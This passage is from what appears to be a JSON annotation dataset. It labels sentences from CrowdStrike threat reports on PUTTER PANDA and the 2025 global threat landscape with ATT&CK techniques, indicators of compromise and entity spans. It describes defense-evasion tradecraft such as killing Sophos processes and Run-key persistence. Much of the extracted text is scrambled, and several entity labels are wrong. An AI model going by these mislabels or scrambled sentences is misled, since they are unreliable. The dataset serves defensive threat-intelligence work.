"label": "Action" }, { "text": "08c7b5501df060ccfc3aa5c8c41b452f", "start": 134, "end": 166, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s240-05107e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 240, "context_before": "The dropped executable (MD5 hash 38a2a6782e1af29ca8cb691cf0d29a0d) primarily aims to inject the specified DLL (McUpdate.dll, MD5 hash 08c7b5501df060ccfc3aa5c8c41b452f) into a process that would normally be accessing the network, likely in order to disguise the malicious activity.", "sentence_text": "Module names corresponding to Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe) are used.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "The malware targets legitimate network-facing processes to blend malicious traffic", "entities": [ { "text": "msinm.exe", "start": 47, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "outlook.exe", "start": 68, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "iexplore.exe", "start": 101, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "firefox.exe", "start": 129, "end": 140, "label": "Infrastructure_Indicator" }, { "text": "are used.", "start": 142, "end": 151, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s241-abcbd5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 241, "context_before": "Module names corresponding to Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe) are used.", "sentence_text": "If Internet Explorer is used, then the malware will attempt to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Terminate Sophos Anti-Virus processes to disable security protections.", "entities": [ { "text": "to terminate processes", "start": 60, "end": 82, "label": "MalwareTool" }, { "text": "SAVAdminService.exe and SavService.exe).", "start": 137, "end": 177, "label": "MalwareTool" }, { "text": "Internet Explorer", "start": 3, "end": 20, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s242-35d9a8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 242, "context_before": "If Internet Explorer is used, then the malware will attempt to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).", "sentence_text": "Four examples of these droppers were located, using a mixture of decoy PDF and Microsoft Word documents (shown below in Figures 15-18).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s243-434f53", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 243, "context_before": "Four examples of these droppers were located, using a mixture of decoy PDF and Microsoft Word documents (shown below in Figures 15-18).", "sentence_text": "The common theme throughout these documents is space technology (Bienvenue_a_Sahaja_Yoga_Toulouse.doc does not follow this trend, but could be targeted at workers at the Toulouse Space Centre, the “largest space centre in Europe” ), indicating that the attackers have a keen interest in this sector, which is also reflected in the choice of name for some of the C2 domains used (see the Attribution section above).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p37-s244-218415", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 37, "sentence_id": 244, "context_before": "The common theme throughout these documents is space technology (Bienvenue_a_Sahaja_Yoga_Toulouse.doc does not follow this trend, but could be targeted at workers at the Toulouse Space Centre, the “largest space centre in Europe” ), indicating that the attackers have a keen interest in this sector, which is also reflected in the choice of name for some of the C2 domains used (see the Attribution section above).", "sentence_text": "vitation_Pleia-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p40-s247-100196", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 40, "sentence_id": 247, "context_before": "Mitigation & Remediation", "sentence_text": "MITIGATION & REMEDIATION A number of specific and generic detection methods are possible for this RAT, both on a host and on the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p40-s248-b7260c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 40, "sentence_id": 248, "context_before": "MITIGATION & REMEDIATION A number of specific and generic detection methods are possible for this RAT, both on a host and on the network.", "sentence_text": "These are detailed below, and are designed to expand upon the indicators reported in other Screenshot of TruecallerCrowdStrike reporting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p40-s249-932745", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 40, "sentence_id": 249, "context_before": "These are detailed below, and are designed to expand upon the indicators reported in other Screenshot of TruecallerCrowdStrike reporting.", "sentence_text": "Database Shared by DEADEYE JACKAL on Their REGISTRY ARTIFACTS Twitter Account (names The following Windows registry artifacts are indicative of a compromised host: redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p40-s250-f6ca23", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 40, "sentence_id": 250, "context_before": "Database Shared by DEADEYE JACKAL on Their REGISTRY ARTIFACTS Twitter Account (names The following Windows registry artifacts are indicative of a compromised host: redacted)\n• ASEP registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, and value named McUpdate FILE SYSTEM ARTIFACTS", "sentence_text": "The presence of the following file system artifacts is indicative of a compromised host:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p45-s253-065975", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 45, "sentence_id": 253, "context_before": "NETWORK SIGNATURES", "sentence_text": "In addition the domains listed in the Appendices and in the Attribution section, the generic signatures below can be used to detect activity from the malware described in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p46-s255-1dc691", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 46, "sentence_id": 255, "context_before": "Snort Rules\nScreenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p47-s256-6a9d08", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 47, "sentence_id": 256, "context_before": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "TTPS: In addition to the indicators described above, PUTTER PANDA have some distinct generic TTPs", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p47-s257-34882b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 47, "sentence_id": 257, "context_before": "TTPS\nIn addition to the indicators described above, PUTTER PANDA have some distinct generic TTPs:\n•", "sentence_text": "Distinctive connectivity checks to www.google.com • Use of the HashData API to derive key material for authentication and encryption •", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Perform connectivity checks to www.google.com\n and use HashData API to derive key material for authentication and encryption", "entities": [ { "text": " www.google.com", "start": 34, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "connectivity checks", "start": 12, "end": 31, "label": "Action" }, { "text": "to derive key material for authentication and encryption", "start": 76, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "HashData API", "start": 63, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p47-s258-8744bb", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 47, "sentence_id": 258, "context_before": "Distinctive connectivity checks to www.google.com • Use of the HashData API to derive key material for authentication and encryption •", "sentence_text": "Use of the ASEP registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run • Deployment of space industry-themed decoy documents during malware installations Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Use ASEP registry Run key for persistence and deploy themed decoy documents during installation.", "entities": [ { "text": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "start": 29, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "Use of the ASEP registry key", "start": 0, "end": 28, "label": "Action" }, { "text": "Deployment of space industry-themed decoy documents", "start": 82, "end": 133, "label": "Action" }, { "text": "Truecaller Database ", "start": 177, "end": 197, "label": "Infrastructure_Indicator" }, { "text": " DEADEYE JACKAL", "start": 206, "end": 221, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p49-s260-523468", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 49, "sentence_id": 260, "context_before": "Conclusion", "sentence_text": "Conclusion: PUTTER PANDA are a determined adversary group who have been operating for several years, conducting ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p49-s261-68915d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 49, "sentence_id": 261, "context_before": "Conclusion\nPUTTER PANDA are a determined adversary group who have been operating for several years, conducting intelligence-gathering operations with a significant focus on the space sector.", "sentence_text": "Although some of their tools are simplistic, taken as a whole their toolset provides a wide degree of control over a victim system and can provide the opportunity to deploy additional tools at will.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Uses a toolset that enables remote control of compromised systems and deployment of additional malicious tools", "entities": [ { "text": "provide the opportunity to deploy additional tools at will.", "start": 139, "end": 198, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p49-s262-c6eed6", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 49, "sentence_id": 262, "context_before": "Although some of their tools are simplistic, taken as a whole their toolset provides a wide degree of control over a victim system and can provide the opportunity to deploy additional tools at will.", "sentence_text": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p49-s263-e1e33d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 49, "sentence_id": 263, "context_before": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests.", "sentence_text": "The detection and mitigation guidance given in this report will help to minimize the risk of a successful compromise by these actors, and future", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p55-s268-80b8aa", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 55, "sentence_id": 268, "context_before": "APPENDIX 3: PNGDOWNER SAMPLE", "sentence_text": "METADATA Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p56-s269-3faa8c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 56, "sentence_id": 269, "context_before": "METADATA Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p59-s271-32a7c5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 59, "sentence_id": 271, "context_before": "APPENDIX 4: HTTPCLIENT SAMPLE METADATA Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "Falcon Intelligence enables organizations Incorporate Actionable Intelligence to prioritize resources by determining targeted Feeds into your existing enterprise versus commodity attacks, saving time and focusing security infrastructure to identify resources on critical threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p59-s272-298674", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 59, "sentence_id": 272, "context_before": "Falcon Intelligence enables organizations Incorporate Actionable Intelligence to prioritize resources by determining targeted Feeds into your existing enterprise versus commodity attacks, saving time and focusing security infrastructure to identify resources on critical threats.", "sentence_text": "Quickly understand the capabilities Access to CrowdStrike Falcon Intelligence is geared and artifacts of targeted attacker toward all levels of an organization, from the tradecra# with In-depth technical executivewho needs to understand the business threat analysis and strategic business impact, to the front-line securiyt professional struggling to !ght through an adversary’s Gain visibility into breaking events attack against the enterprise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s273-86e36f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 273, "context_before": "Quickly understand the capabilities Access to CrowdStrike Falcon Intelligence is geared and artifacts of targeted attacker toward all levels of an organization, from the tradecra# with In-depth technical executivewho needs to understand the business threat analysis and strategic business impact, to the front-line securiyt professional struggling to !ght through an adversary’s Gain visibility into breaking events attack against the enterprise.", "sentence_text": "Less prevents damage from targeted attacks in real-time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s274-b1631c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 274, "context_before": "Less prevents damage from targeted attacks in real-time.", "sentence_text": "than 2MB footprint executable Falcon Host is comprised of two core components, • Detects attacks based on adversary activity the cloud-based management console and the • Integrates with existing security architecture and SIEM tools on-premises host-based sensor that continuously through Falcon Host APIs monitors threat activity at the endpoint to prevent damage in real-time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s275-6a9399", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 275, "context_before": "than 2MB footprint executable Falcon Host is comprised of two core components, • Detects attacks based on adversary activity the cloud-based management console and the • Integrates with existing security architecture and SIEM tools on-premises host-based sensor that continuously through Falcon Host APIs monitors threat activity at the endpoint to prevent damage in real-time.", "sentence_text": "Technology Drivers: Stateful Execution inspection Falcon Host leverages a lightweight kernel-mode Stateful Execution Inspection (SEI) tracks execution state and sensor that shadows, captures, and correlates low- links together various stages of the kill chain, from initial code level operating system events to instantly identify execution to data exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s276-4121f3", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 276, "context_before": "Technology Drivers:\nStateful Execution inspection Falcon Host leverages a lightweight kernel-mode Stateful Execution Inspection (SEI) tracks execution state and sensor that shadows, captures, and correlates low- links together various stages of the kill chain, from initial code level operating system events to instantly identify execution to data exfiltration.", "sentence_text": "the adversary tradecraft and activities through Stateful Execution Inspection (SEI) at the endpoint and Machine Learning in the cloud.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s277-85be42", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 277, "context_before": "the adversary tradecraft and activities through Stateful Execution Inspection (SEI) at the endpoint and Machine Learning in the cloud.", "sentence_text": "As opposed inspection and analysis to understand the full context of a to focusing on malware signatures, indicators of cyber attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s278-7528fb", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 278, "context_before": "As opposed inspection and analysis to understand the full context of a to focusing on malware signatures, indicators of cyber attack.", "sentence_text": "SEI is critical to understanding the entire compromise, exploits, and vulnerabilities, Falcon Host attack life cycle and preventing the damage from advanced instead identifies mission objectives of the adversary malware and targeted attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s279-bf9e9d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 279, "context_before": "SEI is critical to understanding the entire compromise, exploits, and vulnerabilities, Falcon Host attack life cycle and preventing the damage from advanced instead identifies mission objectives of the adversary malware and targeted attacks.", "sentence_text": "Existing security technologies leveraging the Kill Chain model and provides realtime that focus solely on malware signatures, incidators of detection by focusing on what the attacker is compromise, exploits, and vulnerabilities doing, as opposed to looking nfor a specific, fail to protect against the majority of attacks as they are blind easily changeable indicator used in an attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s280-359509", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 280, "context_before": "Existing security technologies leveraging the Kill Chain model and provides realtime that focus solely on malware signatures, incidators of detection by focusing on what the attacker is compromise, exploits, and vulnerabilities doing, as opposed to looking nfor a specific, fail to protect against the majority of attacks as they are blind easily changeable indicator used in an attack.", "sentence_text": "to the full scope of adversary activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s281-fc1fb7", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 281, "context_before": "to the full scope of adversary activity.", "sentence_text": "Without performing intrusive and performance- Benefits impacting scans of the system, Falcon Host’s highly • Identify and protect against damage from determined efficient real-time monitoring of all system activity attackers who are undetected by existing passive is the only security solution that provides maximum defense solutions visibility into all adversary activities, including • Understand who is attacking you, why and what they want Adversary-in-Motion: reconnaissance, exploitation, to steal or damage privilege escalation, lateral movement, and • Alert and stop exfiltration of sensitive information from exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s282-97fc79", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 282, "context_before": "Without performing intrusive and performance- Benefits impacting scans of the system, Falcon Host’s highly • Identify and protect against damage from determined efficient real-time monitoring of all system activity attackers who are undetected by existing passive is the only security solution that provides maximum defense solutions visibility into all adversary activities, including • Understand who is attacking you, why and what they want Adversary-in-Motion: reconnaissance, exploitation, to steal or damage privilege escalation, lateral movement, and • Alert and stop exfiltration of sensitive information from exfiltration.", "sentence_text": "compromised machines Protect remote users when they are outside of the corporate network Falcon Host delivers insight into past and current • Protect remote users when they are outside of the attacks not only on a single host, but also across corporate network devices and networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p60-s283-e2321e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 60, "sentence_id": 283, "context_before": "compromised machines Protect remote users when they are outside of the corporate network Falcon Host delivers insight into past and current • Protect remote users when they are outside of the attacks not only on a single host, but also across corporate network devices and networks.\n•", "sentence_text": "No on-premises equipment needed, reducing overall total cost of ownership", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p61-s285-e05380", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 61, "sentence_id": 285, "context_before": "About CrowdStrike\nidentifying advanced threats and targeted attacks.", "sentence_text": "Using big-data technologies, Stateful Execution Inspection (SEI) at the endpoint and Machine Learning in the cloud instead of solely focusing on malware signatures, indicators of compromise, exploits, and vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p61-s286-68ba2a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 61, "sentence_id": 286, "context_before": "Using big-data technologies, Stateful Execution Inspection (SEI) at the endpoint and Machine Learning in the cloud instead of solely focusing on malware signatures, indicators of compromise, exploits, and vulnerabilities.", "sentence_text": "The CrowdStrike Falcon Platform is a combination of big data technologies and endpoint security driven by advanced threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p61-s287-ccad2d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 61, "sentence_id": 287, "context_before": "The CrowdStrike Falcon Platform is a combination of big data technologies and endpoint security driven by advanced threat intelligence.", "sentence_text": "About CrowdStrike Services for proactively defending against and responding to cyber incidents with pre and post Incident Response services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p61-s288-e70b34", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 61, "sentence_id": 288, "context_before": "About CrowdStrike Services for proactively defending against and responding to cyber incidents with pre and post Incident Response services.", "sentence_text": "The CrowdStrike Services team leverages our Security Operations Center to monitor the full CrowdStrike Falcon Platform and provide cutting-edge advanced adversary intrusion detection services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p61-s289-9b184d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 61, "sentence_id": 289, "context_before": "The CrowdStrike Services team leverages our Security Operations Center to monitor the full CrowdStrike Falcon Platform and provide cutting-edge advanced adversary intrusion detection services.", "sentence_text": "The full spectrum of proactive and response services helps customers respond tactically as well as continually mature and strategically evolve Incident Response program capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p62-s290-031b7d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 62, "sentence_id": 290, "context_before": "The full spectrum of proactive and response services helps customers respond tactically as well as continually mature and strategically evolve Incident Response program capabilities.", "sentence_text": "For more information on the intelligence provided in this report or on any of the 70+ actors tracked by the CrowdStrike Global Intelligence team, To learn more about the CrowdStrike Falcon Platform or", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s2-f73d0a", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "E X E C U T I V E S", "sentence_text": "EXECUTIVE SUMMARY\nThe Year of the Enterprising Adversary Each year, the CrowdStrike Global Threat Report provides the cybersecurity industry with a comprehensive analysis of the previous year’s threat landscape and the adversary behavior and tradecraft that shaped it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s3-d67c2a", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "EXECUTIVE SUMMARY\nThe Year of the Enterprising Adversary Each year, the CrowdStrike Global Threat Report provides the cybersecurity industry with a comprehensive analysis of the previous year’s threat landscape and the adversary behavior and tradecraft that shaped it.", "sentence_text": "Modern adversariesare determined and professional.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s4-7629c8", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "Modern adversariesare determined and professional.", "sentence_text": "They are quick to learn and adapt »FOR MORE INFORMATION ON ANY to changing defenses while staying laser-focused on their goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s5-c5b860", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "They are quick to learn and adapt »FOR MORE INFORMATION ON ANY to changing defenses while staying laser-focused on their goals.", "sentence_text": "OF THE ADVERSARIES MENTIONED IN THIS EXECUTIVE SUMMARY AND To stop them, we must know them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s6-398d96", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "OF THE ADVERSARIES MENTIONED IN THIS EXECUTIVE SUMMARY AND To stop them, we must know them.", "sentence_text": "THE their activity — and ultimately, a stronger defense.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s7-e0d8a4", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "THE their activity — and ultimately, a stronger defense.", "sentence_text": "The CrowdStrike 2025 Global Threat Report takes a look back at 2024 so readers can gain a fuller picture of the threats they face.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s8-68ce1f", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "The CrowdStrike 2025 Global Threat Report takes a look back at 2024 so readers can gain a fuller picture of the threats they face.", "sentence_text": "This report consists of observations from the elite CrowdStrike Counter Adversary Operations team, which combines the power of threat intelligence with the speed of dedicated threat hunting teams and trillions of telemetry events from the AI-native CrowdStrike Falcon® platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p2-s9-d18b0d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "This report consists of observations from the elite CrowdStrike Counter Adversary Operations team, which combines the power of threat intelligence with the speed of dedicated threat hunting teams and trillions of telemetry events from the AI-native CrowdStrike Falcon® platform.", "sentence_text": "This executive summary is an overview of the report’s key findings, which detail critical information on what security teams need to know — and do — in an increasingly complex threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s10-f78fd2", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 10, "context_before": "This executive summary is an overview of the report’s key findings, which detail critical information on what security teams need to know — and do — in an increasingly complex threat landscape.", "sentence_text": "EXECUTIVE SUMMARY\nThreat Landscape\nOverview\nAdversaries continue to accelerate: The average eCrime breakout time — the time it takes for an adversary to move from an initially compromised host 00:51 to another within the target organization — dropped to 48 minutes in 2024, with the fastest breakout time recorded at 51 seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s11-9635cc", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 11, "context_before": "EXECUTIVE SUMMARY\nThreat Landscape\nOverview\nAdversaries continue to accelerate: The average eCrime breakout time — the time it takes for an adversary to move from an initially compromised host 00:51 to another within the target organization — dropped to 48 minutes in 2024, with the fastest breakout time recorded at 51 seconds.", "sentence_text": "Access methods are evolving: Adversaries adopted voice phishing (vishing), callback phishing, and help desk social engineering to enter target networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s12-769aff", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 12, "context_before": "Access methods are evolving: Adversaries adopted voice phishing (vishing), callback phishing, and help desk social engineering to enter target networks.", "sentence_text": "They also relied on compromised credentials: Access broker advertisements, which sell valid stolen credentials, surged 50% year-over-year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s13-adceb5", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 13, "context_before": "They also relied on compromised credentials: Access broker advertisements, which sell valid stolen credentials, surged 50% year-over-year.", "sentence_text": "More than half (52%) of vulnerabilities CrowdStrike observed in 2024 were related to initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s14-0c55b3", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 14, "context_before": "More than half (52%) of vulnerabilities CrowdStrike observed in 2024 were related to initial access.", "sentence_text": "Stealth remains a priority: Modern threats are dominated by interactive intrusion techniques, where adversaries use hands-on-keyboard actions to achieve their goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p3-s15-ac0a4c", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "Stealth remains a priority: Modern threats are dominated by interactive intrusion techniques, where adversaries use hands-on-keyboard actions to achieve their goals.", "sentence_text": "Cloud environments are under siege: Cloud continues to be a prime target due to its vast data, scalability, and exploitable misconfigurations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p4-s16-df9de1", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 4, "sentence_id": 16, "context_before": "Cloud environments are under siege: Cloud continues to be a prime target due to its vast data, scalability, and exploitable misconfigurations.", "sentence_text": "EXECUTIVE SUMMARY\nADVERSARY 